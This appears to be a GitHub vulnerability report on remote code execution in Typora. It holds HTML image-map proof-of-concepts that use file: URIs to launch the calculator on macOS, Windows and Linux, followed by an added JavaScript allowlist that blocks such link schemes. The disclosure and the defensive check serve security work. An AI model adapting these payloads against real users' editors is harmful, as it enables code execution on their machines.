Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability #2166

Closed
@r0t0tiller

Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability

Description:

Typora fails to sanitize input on HTML attributes. Abusing the file:\\ URI scheme on HTML attributes can result in arbitrary code execution. The proofs of concept below will execute the calculator when opened inside of Typora (MacOS, Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability (PoC.zip).

Tested On: MacOS 10.14.2, Ubuntu 18.04, Windows 10

Proof of Concepts:

MacOS:

<!DOCTYPE html>
<html>
<body>
    <p>
        Click me!
    </p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
  <area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\Applications\Calculator.app">
</map>
</body>
</html>

Windows:

<!DOCTYPE html>
<html>
<body>
    <p>
        Click me!
    </p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
  <area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file://C|Windows/System32/calc.exe">
</map>
</body>
</html>

Linux:

<!DOCTYPE html>
<html>
<body>
    <p>
        Click me!
    </p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
  <area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\">
</map>
</body>
</html>

PoC.zip
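
A defensive check for the issue reported above, as an added example that is not part of the original report and not Typora's code: an allowlist that decides whether a link target from rendered HTML may be handed to the OS open handler. The function name, the allowed-scheme set and the sentinel base URL are assumptions made for illustration.

```javascript
// Added example (hypothetical helper, not Typora's code): decide whether a
// link target taken from rendered Markdown/HTML may go to the OS open handler.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumed policy
// Constructed sentinel base, used only to recognise relative references.
const SENTINEL_HOST = "relative-ref.invalid";
const SENTINEL_BASE = `https://${SENTINEL_HOST}/`;

function classifyLinkTarget(raw) {
  if (typeof raw !== "string") return { allowed: false, reason: "not a string" };
  let url;
  try {
    // The WHATWG parser trims surrounding whitespace, lowercases the scheme
    // and treats "\" as "/" for special schemes, so "file:\\\x" is still file:.
    url = new URL(raw, SENTINEL_BASE);
  } catch {
    return { allowed: false, reason: "unparseable" };
  }
  if (url.hostname === SENTINEL_HOST) {
    // No scheme of its own: resolve inside the app, never via the OS handler.
    return { allowed: false, reason: "relative reference" };
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { allowed: false, reason: `scheme ${url.protocol} not allowed` };
  }
  return { allowed: true, reason: "ok", href: url.href };
}

// Constructed sample: the three href values from the report, an upper-case
// variant with leading whitespace, and benign links.
const SAMPLES = [
  "file:\\\\\\Applications\\Calculator.app",
  "file://C|Windows/System32/calc.exe",
  "file:\\\\\\",
  " \tFILE:///etc/hostname",
  "exploit.gif",
  "https://example.com/docs",
  "mailto:user@example.com",
];

function runSamples() {
  return SAMPLES.map((input) => ({ input, ...classifyLinkTarget(input) }));
}

for (const r of runSamples()) {
  console.log(r.allowed ? "ALLOW" : "BLOCK", JSON.stringify(r.input), r.reason);
}
```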
